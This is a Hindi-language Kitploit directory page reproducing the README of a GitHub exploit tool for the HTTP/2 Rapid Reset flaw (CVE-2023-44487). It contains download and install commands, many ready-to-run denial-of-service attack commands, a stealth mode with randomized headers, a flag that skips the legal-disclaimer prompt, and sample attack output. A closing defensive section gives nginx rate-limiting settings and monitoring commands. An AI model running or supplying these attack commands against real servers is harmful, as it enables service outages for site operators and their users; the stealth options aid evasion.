Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — उन्नत CVE-2023-44487 HTTP/2 Rapid Reset भेद्यता शोषण ढांचा। इसमें मल्टी-कनेक्शन समवर्ती हमले, अनुकूली दर नियंत्रण, यादृच्छिक हेडर के साथ स्टील्थ मोड, रीयल-टाइम मेट्रिक्स, और जोखिम मूल्यांकन रिपोर्टिंग शामिल हैं। केवल अधिकृत पैठ परीक्षण के लिए। सुदीपा वानिगरत्ना द्वारा। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

उन्नत CVE-2023-44487 HTTP/2 Rapid Reset भेद्यता शोषण ढांचा। इसमें मल्टी-कनेक्शन समवर्ती हमले, अनुकूली दर नियंत्रण, यादृच्छिक हेडर के साथ स्टील्थ मोड, रीयल-टाइम मेट्रिक्स, और जोखिम मूल्यांकन रिपोर्टिंग शामिल हैं। केवल अधिकृत पैठ परीक्षण के लिए। सुदीपा वानिगरत्ना द्वारा।

रिपॉजिटरी देखें
141 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-44487 HTTP/2 DoS रैपिड रीसेट एक्सप्लॉइट

प्रोफेशनल एडिशन v1.0.1 | लेखक: सुदीपा वानिगरत्न

Python Version License Version CVSS


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएँ
  • आवश्यकताएँ
  • इंस्टॉलेशन
  • त्वरित आरंभ
  • उपयोग गाइड
  • कॉन्फ़िगरेशन विकल्प
  • Docker समर्थन
  • उदाहरण
  • परिणामों को समझना
  • सुरक्षा अनुशंसाएँ
  • कानूनी अस्वीकरण
  • लेखक
  • परिवर्तन लॉग

  • अवलोकन

    CVE-2023-44487, यानी HTTP/2 रैपिड रीसेट भेद्यता के लिए एक प्रोफेशनल-ग्रेड मूल्यांकन फ्रेमवर्क। यह टूल सुरक्षा पेशेवरों को हाल के वर्षों में खुलासा किए गए सबसे प्रभावशाली HTTP/2 DoS स्थितियों में से एक के विरुद्ध सिस्टम का परीक्षण और सत्यापन करने में मदद करता है।

    यह प्रदर्शित करता है कि कैसे HTTP/2 स्ट्रीम को तेज़ी से बनाना और रीसेट करना सर्वर संसाधनों को समाप्त कर सकता है और डिनायल ऑफ सर्विस (DoS) स्थितियों को जन्म दे सकता है।

    एक नज़र में मुख्य विशेषताएँ

    • मल्टी-कनेक्शन अटैक इंजन — समवर्ती HTTP/2 कनेक्शन
    • अनुकूली दर नियंत्रण — अधिकतम प्रभावशीलता के लिए गतिशील समायोजन
    • स्टील्थ मोड — यादृच्छिक हेडर और कनेक्शन रोटेशन
    • व्यापक रिपोर्टिंग — जोखिम मूल्यांकन के साथ JSON/CSV
    • Docker समर्थन — कंटेनरीकृत डिप्लॉयमेंट
    • रीयल-टाइम मॉनिटरिंग — लाइव अटैक मेट्रिक्स और प्रगति
    • प्रोफेशनल लॉगिंग — फ़ाइल लॉगिंग के साथ रंगीन कंसोल आउटपुट
    उपयोगपरिणाम

    भेद्यता विवरण

    CVE-2023-44487: HTTP/2 रैपिड रीसेट अटैक

    गुणमान
    CVE IDCVE-2023-44487
    CVSS स्कोर7.5 (उच्च)
    हमला वेक्टरनेटवर्क
    हमले की जटिलतानिम्न
    प्रभावडिनायल ऑफ सर्विस (संसाधन क्षरण)
    प्रभावित प्रोटोकॉलHTTP/2
    प्रकटीकरण तिथिअक्टूबर 2023

    तकनीकी अवलोकन

    यह भेद्यता HTTP/2 प्रोटोकॉल के स्ट्रीम प्रबंधन तंत्र का शोषण करती है:

    1. स्ट्रीम निर्माण — क्लाइंट नई स्ट्रीम बनाने के लिए HEADERS फ्रेम भेजता है
    2. तत्काल रीसेट — क्लाइंट तुरंत RST_STREAM फ्रेम भेजता है
    3. सर्वर प्रोसेसिंग — सर्वर को दोनों फ्रेम प्रोसेस करने पड़ते हैं, जिससे संसाधनों की खपत होती है
    4. संसाधन क्षरण — बार-बार चक्र सर्वर संसाधनों को अभिभूत कर देते हैं

    प्रभाव

    • HTTP/2 सर्वर पर संसाधन क्षरण
    • संभावित डिनायल ऑफ सर्विस (DoS)
    • लोड बैलेंसर, प्रॉक्सी और CDN को प्रभावित कर सकता है
    • किसी प्रमाणीकरण या विशेष विशेषाधिकार की आवश्यकता नहीं

    विशेषताएँ

    मुख्य विशेषताएँ

    विशेषताविवरण
    HTTP/2 समर्थनh2 लाइब्रेरी का उपयोग करके पूर्ण HTTP/2 प्रोटोकॉल कार्यान्वयन
    मल्टी-कनेक्शनकई कनेक्शनों में समवर्ती हमला
    SSL/TLSप्रमाणपत्र सत्यापन विकल्पों के साथ HTTPS समर्थन
    अनुकूली दर नियंत्रणसर्वर प्रतिक्रिया के आधार पर हमले की दर को गतिशील रूप से समायोजित करता है
    स्टील्थ मोडयादृच्छिक हेडर और कनेक्शन रोटेशन
    रीयल-टाइम मॉनिटरिंगरन के दौरान लाइव मेट्रिक्स प्रदर्शन
    व्यापक रिपोर्टजोखिम मूल्यांकन के साथ JSON/CSV आउटपुट
    Docker समर्थनआसान परीक्षण के लिए कंटेनरीकृत डिप्लॉयमेंट

    उन्नत क्षमताएँ

    • प्रॉक्सी समर्थन — एक्स्टेंसिबल प्रॉक्सी कॉन्फ़िगरेशन
    • कनेक्शन पूलिंग — कुशल कनेक्शन प्रबंधन
    • त्रुटि पुनर्प्राप्ति — कनेक्शन विफलताओं का सुगम संचालन
    • प्रदर्शन ट्यूनिंग — विभिन्न परिदृश्यों के लिए कॉन्फ़िगर करने योग्य सेटिंग्स
    • CI/CD एकीकरण — स्वचालित सुरक्षा परीक्षण के लिए उपयुक्त

    आवश्यकताएँ

    सिस्टम आवश्यकताएँ

    घटकन्यूनतमअनुशंसित
    OSLinux / macOS / WindowsLinux या macOS
    Python3.7+3.11+
    CPU2 कोर4+ कोर
    RAM2GB4GB+
    नेटवर्क100Mbps1Gbps+

    निर्भरताएँ

    root@kitploit:~
    h2>=4.1.0,<5.0.0
    aiohttp>=3.8.0,<4.0.0
    

    इंस्टॉलेशन

    1. त्वरित इंस्टॉल

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 cve-2023-44487-exploit.py --help
    

    2. वर्चुअल एनवायरनमेंट (अनुशंसित)

    root@kitploit:~
    # Create virtual environment
    python3 -m venv venv
    
    # Activate virtual environment
    # On Linux/macOS:
    source venv/bin/activate
    # On Windows:
    venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    

    3. Docker इंस्टॉलेशन

    root@kitploit:~
    # Build Docker image
    docker build -t cve-2023-44487-exploit .
    
    # Run with Docker
    docker run --rm cve-2023-44487-exploit target.com
    

    4. मैनुअल इंस्टॉलेशन

    root@kitploit:~
    # Install without requirements.txt
    pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
    
    # Download the exploit
    wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
    
    # Make executable
    chmod +x cve-2023-44487-exploit.py
    

    त्वरित आरंभ

    बुनियादी उपयोग

    root@kitploit:~
    # Simple run with default settings
    python3 cve-2023-44487-exploit.py example.com
    
    # Test HTTPS on port 443
    python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
    
    # Test HTTP on port 80
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    

    त्वरित परीक्षण (5 सेकंड)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    पूर्ण मूल्यांकन (60 सेकंड)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
    

    उपयोग गाइड

    कमांड लाइन विकल्प

    लक्ष्य कॉन्फ़िगरेशन

    विकल्पविवरणडिफ़ॉल्ट
    hostलक्ष्य होस्टनाम या IPआवश्यक
    -p, --portलक्ष्य पोर्ट443
    --no-sslSSL/TLS अक्षम करेंFalse
    --no-verifySSL सत्यापन छोड़ेंFalse

    अटैक कॉन्फ़िगरेशन

    विकल्पविवरणडिफ़ॉल्ट
    -c, --connectionsसमवर्ती कनेक्शनों की संख्या50
    -s, --streamsप्रति कनेक्शन स्ट्रीम1000
    -d, --durationअवधि (सेकंड में)30
    --max-streamsअधिकतम कुल स्ट्रीम100000
    --delayसंचालनों के बीच आधार विलंब0.0001s

    उन्नत विकल्प

    विकल्पविवरणडिफ़ॉल्ट
    --adaptiveअनुकूली दर नियंत्रणTrue
    --target-rpsप्रति सेकंड लक्षित अनुरोध10000
    --stealthस्टील्थ मोड (यादृच्छिक हेडर)False
    --skip-validationलक्ष्य सत्यापन छोड़ेंFalse
    --forceकानूनी अस्वीकरण संकेत छोड़ेंFalse

    रिपोर्टिंग

    विकल्पविवरणडिफ़ॉल्ट
    -o, --outputआउटपुट फ़ाइल नामexploit_results.json
    --formatआउटपुट प्रारूप (json / csv / console)json
    -v, --verboseवर्बोज़ लॉगिंगFalse

    कॉन्फ़िगरेशन विकल्प

    ऊपर दिए गए CLI फ़्लैग का उपयोग करके कॉनकरंसी, स्ट्रीम वॉल्यूम, अवधि और रिपोर्टिंग को ट्यून करें। प्रारंभिक सत्यापन के लिए कम -c / -s / -d मान पसंद करें, और फिर केवल उन्हीं सिस्टम पर स्केल करें जिनका स्ट्रेस-टेस्ट करने के लिए आप अधिकृत हैं।

    परिदृश्यसुझाए गए फ़्लैग
    स्मोक टेस्ट-c 10 -s 100 -d 5
    मानक मूल्यांकन-c 50 -s 1000 -d 30
    उच्च-लोड लैब परीक्षण-c 100 -s 2000 -d 60 --stealth
    अविश्वसनीय प्रमाणपत्र--no-verify
    प्लेन HTTP-p 80 --no-ssl

    Docker समर्थन

    इमेज बनाएं

    root@kitploit:~
    docker build -t cve-2023-44487-exploit .
    

    बुनियादी मूल्यांकन चलाएं

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com
    

    कस्टम पैरामीटर के साथ चलाएं

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
    

    परिणाम स्थानीय रूप से सहेजें

    root@kitploit:~
    docker run --rm -v "$(pwd)/results:/app/results" \
      cve-2023-44487-exploit target.com -o /app/results/report.json
    

    इंटरैक्टिव मोड

    root@kitploit:~
    docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
    

    Docker Compose

    root@kitploit:~
    # Start with docker-compose
    docker-compose up
    
    # Run with a custom command
    docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
    

    उदाहरण

    1. बुनियादी HTTPS मूल्यांकन

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
    

    2. HTTP मूल्यांकन (SSL के बिना)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
    

    3. उच्च-प्रदर्शन लैब रन

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
    

    4. स्टील्थ मोड

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
    

    5. त्वरित सत्यापन परीक्षण

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    6. CSV रिपोर्ट बनाएं

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
    

    7. सत्यापन छोड़ें

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
    

    8. अधिकृत प्रोडक्शन परीक्षण

    root@kitploit:~
    python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
      -c 100 -s 2000 -d 60 --stealth -o full_report.json
    

    परिणामों को समझना

    आउटपुट मेट्रिक्स

    मेट्रिकविवरणव्याख्या
    कुल स्ट्रीमनिर्मित स्ट्रीमों की संख्याअधिक संख्या = अधिक लोड उत्पन्न
    सफल रीसेटसफलतापूर्वक रीसेट की गई स्ट्रीमआमतौर पर भेद्य लक्ष्यों पर >90%
    रीसेट दर (RPS)प्रति सेकंड रीसेटउच्च दर = अधिक प्रभावी लोड
    सफलता दरसफल रीसेट का प्रतिशत>90% अक्सर संवेदनशीलता का संकेत देता है
    कनेक्शन त्रुटियाँविफल कनेक्शनकम = स्थिर कनेक्टिविटी
    सर्वर रीसेटसर्वर-आरंभिक रीसेटउच्च = सुरक्षात्मक उपाय मौजूद

    जोखिम मूल्यांकन स्तर

    स्तरस्कोरअर्थ
    गंभीर80–100सर्वर अत्यधिक भेद्य
    उच्च60–79सर्वर भेद्य, कुछ सुरक्षा मौजूद
    मध्यम40–59कुछ सुरक्षा लागू
    निम्न0–39अच्छी तरह से सुरक्षित सर्वर

    नमूना आउटपुट

    root@kitploit:~
    ================================================================================
    EXPLOIT EXECUTION SUMMARY
    ================================================================================
    Target: target.com:443
    Duration: 30.00s
    Total Streams: 15,234
    Successful Resets: 15,198
    Reset Rate: 506.6/s
    Success Rate: 99.76%
    Connection Errors: 0
    --------------------------------------------------------------------------------
    RISK ASSESSMENT
    --------------------------------------------------------------------------------
    Risk Level: CRITICAL
    Risk Score: 95/100
    Factors:
      - Extremely high reset rate accepted
      - Very high success rate
    ================================================================================
    

    सुरक्षा अनुशंसाएँ

    सिस्टम प्रशासकों के लिए

    तत्काल कार्रवाई

    1. सुरक्षा पैच लागू करें

      • नवीनतम HTTP/2 कार्यान्वयन में अपडेट करें
      • विक्रेता-विशिष्ट सुरक्षा पैच लागू करें
      • लोड बैलेंसर और प्रॉक्सी अपडेट करें
    2. रेट लिमिटिंग लागू करें

      root@kitploit:~
      # Nginx rate limiting example
      http {
          limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
          limit_req zone=http2 burst=20 nodelay;
      }
      
    3. कनेक्शन सीमाएँ

      root@kitploit:~
      # Limit connections per client
      limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
      limit_conn conn_zone 10;
      

    कॉन्फ़िगरेशन हार्डनिंग

    सेटिंगअनुशंसा
    अधिकतम समवर्ती स्ट्रीमप्रति कनेक्शन 100–200 सेट करें
    स्ट्रीम रीसेट दरप्रति क्लाइंट <100/सेकंड तक सीमित करें
    कनेक्शन सीमाप्रति IP अधिकतम 50–100 कनेक्शन
    टाइमआउट माननिष्क्रिय टाइमआउट कम करें
    अनुरोध आकार सीमाएँहेडर आकार और पेलोड सीमित करें

    निगरानी

    root@kitploit:~
    # Monitor HTTP/2 connections
    netstat -an | grep 443 | grep ESTABLISHED | wc -l
    
    # Monitor reset-related log entries (example)
    grep "RST_STREAM" /var/log/nginx/error.log | wc -l
    

    अनुशंसित सुरक्षा नियंत्रण

    • रेट लिमिटिंग — प्रति-क्लाइंट स्ट्रीम सीमाएँ लागू करें
    • कनेक्शन थ्रॉटलिंग — प्रति IP कनेक्शन सीमित करें
    • संसाधन सीमाएँ — कनेक्शन टाइमआउट मान सेट करें
    • निगरानी — विसंगतियों के लिए लॉगिंग और अलर्ट सक्षम करें
    • WAF नियम — HTTP/2-विशिष्ट WAF नियम लागू करें
    • पैच प्रबंधन — नियमित सुरक्षा अपडेट
    • इंसिडेंट रिस्पॉन्स — DoS हमलों के लिए एक योजना रखें

    कानूनी अस्वीकरण

    महत्वपूर्ण: इस टूल का उपयोग करने से पहले इसे ध्यान से पढ़ें

    यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

    उपयोग की शर्तें

    इस टूल का उपयोग करके, आप स्वीकार करते हैं और सहमत होते हैं कि:

    1. आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट लिखित अनुमति है
    2. आप इस मूल्यांकन के जोखिमों और संभावित प्रभाव को समझते हैं
    3. आप सभी लागू कानूनों और विनियमों का पालन करेंगे
    4. आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं
    5. आप इस टूल का उपयोग अनधिकृत गतिविधियों के लिए नहीं करेंगे

    निषिद्ध उपयोग

    इस टूल का उपयोग इनके लिए नहीं किया जाना चाहिए:

    • अनधिकृत परीक्षण या हमले
    • उन प्रणालियों के विरुद्ध डिनायल ऑफ सर्विस जिनके आप स्वामी नहीं हैं या परीक्षण की अनुमति नहीं है
    • प्राधिकरण के बिना प्रोडक्शन प्रणालियों को बाधित करना
    • वित्तीय क्षति पहुँचाना
    • कोई भी अवैध गतिविधि

    दायित्व वक्तव्य

    लेखक और योगदानकर्ता इस टूल को बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान करते हैं। इस टूल का उपयोग आपके अपने जोखिम पर है। इस टूल के उपयोग से उत्पन्न किसी भी क्षति या कानूनी समस्या के लिए लेखक जिम्मेदार नहीं है।

    इस टूल का अनधिकृत उपयोग निम्नलिखित कानूनों का उल्लंघन कर सकता है, जिनमें ये शामिल हैं, लेकिन इन्हीं तक सीमित नहीं:

    • कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) — USA
    • कंप्यूटर मिसयूज़ एक्ट — UK
    • जनरल डेटा प्रोटेक्शन रेगुलेशन (GDPR) — EU
    • अन्य प्रासंगिक स्थानीय, राष्ट्रीय और अंतर्राष्ट्रीय कानून

    लेखक

    सुदीपा वानिगरत्न

    • सुरक्षा शोधकर्ता और पेनेट्रेशन टेस्टर
    • एप्लिकेशन सुरक्षा और प्रोटोकॉल भेद्यता में विशेषज्ञता
    • GitHub
    • LinkedIn

    परिवर्तन लॉग

    संस्करण 1.0.1 (वर्तमान)

    • connection_attempts एट्रिब्यूट त्रुटि ठीक की गई
    • SSL/ALPN सत्यापन में सुधार किया गया
    • टाइमआउट हैंडलिंग जोड़ी गई
    • बेहतर त्रुटि पुनर्प्राप्ति
    • --skip-validation फ़्लैग जोड़ा गया
    • Docker समर्थन में सुधार किया गया

    संस्करण 1.0.0 (प्रारंभिक)

    • प्रोफेशनल एडिशन का प्रारंभिक रिलीज़
    • मल्टी-कनेक्शन अटैक इंजन
    • अनुकूली दर नियंत्रण
    • स्टील्थ मोड
    • व्यापक रिपोर्टिंग
    • Docker समर्थन

    लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।


    आभार

    • HTTP/2 प्रोटोकॉल टीम
    • सुरक्षा शोधकर्ता जिन्होंने CVE-2023-44487 की पहचान की
    • ओपन सोर्स समुदाय (h2, aiohttp प्रोजेक्ट)

    संदर्भ

    • CVE-2023-44487 NVD प्रविष्टि
    • HTTP/2 रैपिड रीसेट अटैक विश्लेषण
    • HTTP/2 प्रोटोकॉल विनिर्देश (RFC 9113)
    • Nginx HTTP/2 सुरक्षा सलाह
    • Apache HTTP/2 सुरक्षा गाइड

    सहायता

    समस्याओं और प्रश्नों के लिए:

    • GitHub मुद्दे: मुद्दा सबमिट करें
    • ईमेल: [email protected]
    • सुरक्षा संपर्क: यदि आपको इस प्रोजेक्ट में कोई भेद्यता मिलती है, तो कृपया जिम्मेदारी से रिपोर्ट करें।

    त्वरित संदर्भ कार्ड

    root@kitploit:~
    # Quick Commands
    
    # Test HTTPS (skip cert verify)
    python3 cve-2023-44487-exploit.py target.com --no-verify
    
    # Test HTTP
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    
    # Quick test (5 seconds)
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
    
    # Full assessment
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
    
    # Skip validation
    python3 cve-2023-44487-exploit.py target.com --skip-validation
    
    # Docker
    docker run --rm cve-2023-44487-exploit target.com
    
    # Help
    python3 cve-2023-44487-exploit.py --help
    

    अनुस्मारक: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस टूल का उपयोग जिम्मेदारीपूर्वक और नैतिक रूप से करें।


    रखरखाव: सुदीपा वानिगरत्न | अंतिम अपडेट: अगस्त 2026

    टूल डाउनलोड करें